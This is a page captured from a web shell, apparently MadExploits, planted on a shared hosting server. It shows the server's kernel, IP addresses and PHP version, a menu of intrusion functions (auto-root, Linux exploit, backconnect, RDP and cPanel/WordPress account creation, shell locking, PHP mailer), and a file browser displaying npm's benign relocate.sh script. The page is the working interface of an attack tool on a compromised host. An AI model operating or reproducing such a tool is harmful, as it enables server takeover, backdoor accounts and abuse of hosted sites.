Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.227.107.59
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.js
3
KB
-rw-r--r--
clean-old.sh
4.17
KB
-rw-r--r--
dep-update
294
B
-rw-r--r--
dev-dep-update
292
B
-rw-r--r--
docs-build.js
825
B
-rw-r--r--
gen-changelog
420
B
-rw-r--r--
gen-dev-ignores.js
350
B
-rw-r--r--
install.sh
5.47
KB
-rw-r--r--
maketest
1.8
KB
-rw-r--r--
pr
3.96
KB
-rw-r--r--
publish-tag.js
151
B
-rw-r--r--
release.sh
889
B
-rw-r--r--
relocate.sh
673
B
-rw-r--r--
update-authors.sh
197
B
-rw-r--r--
update-dist-tags.js
3.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : relocate.sh
#!/usr/bin/env bash # Change the cli shebang to point at the specified node # Useful for when the program is moved around after install. # Also used by the default 'make install' in node to point # npm at the newly installed node, rather than the first one # in the PATH, which would be the default otherwise. # bash /path/to/npm/scripts/relocate.sh $nodepath # If $nodepath is blank, then it'll use /usr/bin/env dir="$(dirname "$(dirname "$0")")" cli="$dir"/bin/npm-cli.js tmp="$cli".tmp node="$1" if [ "x$node" = "x" ]; then node="/usr/bin/env node" fi node="#!$node" sed -e 1d "$cli" > "$tmp" echo "$node" > "$cli" cat "$tmp" >> "$cli" rm "$tmp" chmod ogu+x $cli
Close